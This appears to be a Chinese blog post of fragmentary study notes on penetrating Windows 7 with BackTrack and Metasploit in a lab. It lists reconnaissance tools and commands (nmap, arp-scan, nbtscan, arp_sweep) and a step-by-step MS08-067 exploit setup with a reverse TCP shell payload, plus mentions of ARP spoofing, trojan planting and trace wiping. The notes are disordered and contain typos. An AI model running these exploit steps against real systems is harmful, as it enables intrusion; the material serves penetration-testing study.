视频: 利用Backtrack渗透windows7
BT4
cd /peetest/exploilt/set
set
4
metasploit生成windows木马,渗透Windows系统
telnet网络查点
msf > use
auxiliary/scanner/telnet
2.2.0网络扫描
主机
端口扫描
操作系统
漏洞
xprobe2
10.10
metaspolit
nmap
nessus
icmp
ping
arping
arp-scan
nbtscan
metasploit
nmap
ping
request报文禁止响应
-c
-s 报文的大小
arping 只能一次一个地址
桥接网卡
arping
10.1.1.47
终结者的arp欺骗
arp-scan --interface=eth2
10.10.10.0/24
主机名
nbtscan 10.1.1.0/24
nmap 10.1.1.29
有端口号
服务名称,找软件bug
nmap -sn 10.10.10.0/24 不加端口只有mac,IP信息
man
ifconfig
dns禁用dns解析
msfconsole
v4.7
arp_sweep
use
auxiliary/scanner/discovery/arp_sweep
show options
set rhosts
10.10.10.1-10.10.10.254
set threads 10
run //大小写敏感
加接口 接口IP
接口mac地址
只有ip信息
退出back退出子程序
其他扫描模块
nmap -sP 缺省执行。icmp/syn/ack/udp
ping功能
2.2.1主机扫描
被攻击者
xprobe 10.10.10.129
nmap -O
10.10.10.254
owasp broken web apps
指纹
nmap 扫描范围不要被限制
如baidu.com 80
443
ctrl+c中止
2。1。2。3端口扫描(服务)
metasploit渗透测试指南
metasloit渗透测试魔鬼训练营
网络攻击技术与实践
攻击流程
软件
常见windows挖掘和攻击
liunx漏洞和攻击
mindmanager
攻击前网络踩点
网络扫描
网络查点
攻击中
渗透。获取权限
攻击后。维持攻击。文件拷贝木马植入。痕迹擦除
metaspolit
autoscan
nmap
2.1.2.4漏洞扫描
nessus
介绍
安装
演示
外围信息搜索
主机探测与端口扫描
服务扫描与查点
网络漏洞扫描
openvas
计算机的内存不足
mind
liunx 安装
ms12-020
开启3389
建立策略
公网地址:home没有权限
红的
09-001
08-067
ms12-020-poc.final
msfconsole
不停的提示
我操
ping 10.1.1.84
unreachable
msfconsole
use
exploit/windows/ms08_068_netapi
show payloads
set payload
generic/shell_reverse_tcp
show options
show targets
set rhost
10.10.10.130
set lhost 10.10.10.131
set lport 5000
set target
5
exploit
rexploit
不支持中文版
http://tieba.baidu.com/p/1681819009http://pan.baidu.com/s/1ntDJh7V
search
ms08_067
攻击载荷
meta
精选 转载上一篇:kali
下一篇:metasploit
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
HTML meta
meta>标签用于提供html文档的元信息(metadata)。这些信息不会显示在页面上,但会被浏览器或搜索引擎用来识别页面的编码方式、关键字、描述、作者信息、刷新时间等。
html 前端 twitter SEO Graph
